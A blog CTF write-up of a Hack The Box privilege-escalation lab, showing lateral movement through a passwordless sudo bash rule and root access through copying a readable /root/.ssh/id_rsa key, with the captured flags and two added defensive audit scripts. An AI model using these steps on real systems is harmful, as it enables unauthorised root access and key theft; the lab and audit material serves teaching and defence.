Daily exercise (privilege escalation)
Challenge
Solution
Question 1:
SSH into the machine
┌──(root㉿HgTrojan)-[~]
└─# ssh [email protected] -p 58664
([email protected]) Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Wed Jan 17 12:24:14 2024 from 10.30.12.112
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$
Use 'sudo -l' to check which privileges we have
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$ sudo -l
Matching Defaults entries for user1 on ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user1 may run the following commands on ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:
(user2 : user2) NOPASSWD: /bin/bash
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$
According to the sudo -l output, user user1 holds one specific sudo privilege on host ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc: user1 may run /bin/bash as user2 (on this host), and no password is required.
So we can build the PoC:
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$ sudo -u user2 /bin/bash
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ ls
shell.sh
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ sudo -u user2 /bin/bash
user2 is not in the sudoers file. This incident will be reported.
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ cat /home/user2/flag.txt
HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$
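The defender's side of the same finding: the rule "(user2 : user2) NOPASSWD: /bin/bash" is exactly the kind of entry a sudoers audit should flag, because any command that hands back a shell turns one account into another without a password. The script below is an added example, not part of the original writeup. It reads `sudo -l` output (or sudoers-style rule lines) on stdin and prints every passwordless rule whose target is a shell or a program that can spawn one; the sample text, host name `host1` and the user3 and ALL rules are constructed, and the SHELL_LIKE list is this example's own assumption about which programs count.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag sudo rules that give the
# caller a shell as another account without a password, like the
# "(user2 : user2) NOPASSWD: /bin/bash" rule in the sudo -l output above.
# The sample below is constructed; host1, user3 and the ALL rule are made up.

SAMPLE_SUDO_L='Matching Defaults entries for user1 on host1:
    env_reset, mail_badpass
User user1 may run the following commands on host1:
    (user2 : user2) NOPASSWD: /bin/bash
    (root) /usr/bin/apt update
    (user3) NOPASSWD: /usr/bin/vim /etc/hosts
    (ALL : ALL) NOPASSWD: /usr/bin/python3'

# Programs that are a shell or can start one from inside (assumed list).
SHELL_LIKE='bash|sh|dash|zsh|ksh|python[0-9.]*|perl|vim|vi'

# Read rule text on stdin; print "<runas> -> <command>" for every rule that
# needs no password and whose command is one of the SHELL_LIKE programs.
risky_sudo_rules() {
    grep -E '^[[:space:]]*\(' |        # only "(runas) ..." rule lines
    grep -E 'NOPASSWD:' |              # only passwordless rules
    grep -E "NOPASSWD:[[:space:]]*(/[^[:space:]]*/)?($SHELL_LIKE)([[:space:]]|$)" |
    sed -E 's/^[[:space:]]*(\([^)]*\))[^:]*NOPASSWD:[[:space:]]*/\1 -> /'
}

# Run the audit over the constructed sample and return the number of findings.
count_risky_in_sample() {
    printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules | wc -l | tr -d ' '
}
```

On a real host, `sudo -l | risky_sudo_rules` run as each interactive user (or `cat /etc/sudoers /etc/sudoers.d/* | risky_sudo_rules` as root) lists the lateral-movement paths the flag here relied on; the apt rule in the sample is not reported because it asks for a password and does not end in a shell.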
Question 2:
Building on the user2 access obtained in question 1, I found that user2 can use vim to view root's /root/.ssh/id_rsa.
┌──(root㉿HgTrojan)-[~]
└─# ssh [email protected] -p 36638
([email protected]) Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Wed Jan 17 13:57:55 2024 from 10.30.12.117
user1@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~$ sudo -u user2 /bin/bash
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/home/user1$ cd /root/.ssh
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/root/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/root/.ssh$ vim id_rsa
Now we copy the key contents into a local id_rsa file and change that file's permissions, because ssh requires private key files to be kept private (otherwise it refuses with "Permissions 0644 for 'id_res' are too open."). Once that is done we can log in as root and grab the flag.
┌──(root㉿HgTrojan)-[~]
└─# vim id_rsa
┌──(root㉿HgTrojan)-[~]
└─# chmod 600 id_rsa
┌──(kali㉿HgTrojan)-[~/桌面]
└─$ ssh [email protected] -p 36638 -i id_res
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~# ls
flag.txt
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~# cat flag.txt
HTB{pr1v1l363_35c4l4710n_2_r007}
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~#
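The root cause in question 2 is not the key itself but the permissions around it: /root/.ssh was readable by another local user, so a key that ssh would refuse to load at 0644 was still fine to copy out. The script below is an added example, not part of the original writeup. It applies the same rule the ssh client applied to the copied key (group and other must have no permission bits on a private key) to a whole `.ssh`-style directory, including the directory itself, so the exposure shows up in an audit instead of in a compromise. It assumes GNU coreutils `stat -c`; the fixture directory and the placeholder key files it builds are constructed and contain no real key material.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a .ssh-style directory
# with the rule ssh used when it rejected the 0644 key above. Assumes GNU
# coreutils `stat -c`; all fixture data below is constructed.

# Octal mode of a path, zero-padded to at least three digits (e.g. 600, 644).
file_mode() {
    printf '%03d' "$(stat -c '%a' "$1")"
}

# A private key (or the directory holding it) is acceptable only when group and
# other have no permission bits, i.e. the last two octal digits are both 0.
# Prints OK or TOO_OPEN.
key_perm_status() {
    case "$(file_mode "$1")" in
        *00) echo OK ;;
        *)   echo TOO_OPEN ;;
    esac
}

# Report the directory itself, then every file whose first line marks it as a
# private key. Public keys, authorized_keys and known_hosts are skipped because
# they are meant to be readable.
audit_ssh_dir() {
    dir=$1
    printf '%s %s\n' "$dir/" "$(key_perm_status "$dir")"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if head -n 1 "$f" | grep -q 'PRIVATE KEY'; then
            printf '%s %s\n' "$f" "$(key_perm_status "$f")"
        fi
    done
}

# Constructed placeholder body; not a real key.
FAKE_KEY='-----BEGIN OPENSSH PRIVATE KEY-----
constructed-placeholder
-----END OPENSSH PRIVATE KEY-----'

# Build a throwaway fixture that mirrors the writeup (a listable key directory
# holding a 0644 private key) and return how many entries are TOO_OPEN.
demo_count_too_open() {
    tmp=$(mktemp -d)
    chmod 755 "$tmp"                                    # directory readable by others
    printf '%s\n' "$FAKE_KEY" > "$tmp/id_rsa"
    chmod 644 "$tmp/id_rsa"                             # the mode ssh rejected above
    printf '%s\n' "$FAKE_KEY" > "$tmp/id_ed25519"
    chmod 600 "$tmp/id_ed25519"                         # correctly restricted
    printf 'ssh-rsa AAAA constructed\n' > "$tmp/id_rsa.pub"
    chmod 644 "$tmp/id_rsa.pub"                         # public key, world-readable is fine
    audit_ssh_dir "$tmp" | grep -c TOO_OPEN || true
    rm -rf "$tmp"
}
```

`audit_ssh_dir /root/.ssh` run as root (or over every home directory) reports two findings on a layout like the one in this box: the directory mode and the id_rsa mode. Fixing both (`chmod 700` on the directory, `chmod 600` on the key) is what would have stopped user2 from reading the key in the first place, since the client-side "too open" check only protects the copy on the attacker's machine, not the original.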
All of my articles are technical notes shared for defensive purposes; every operation was carried out in a lab environment. Do not use them for any other purpose; you bear the consequences otherwise. Unless otherwise stated, all posts on this blog are licensed under BY-NC-SA. Please credit the source when reposting!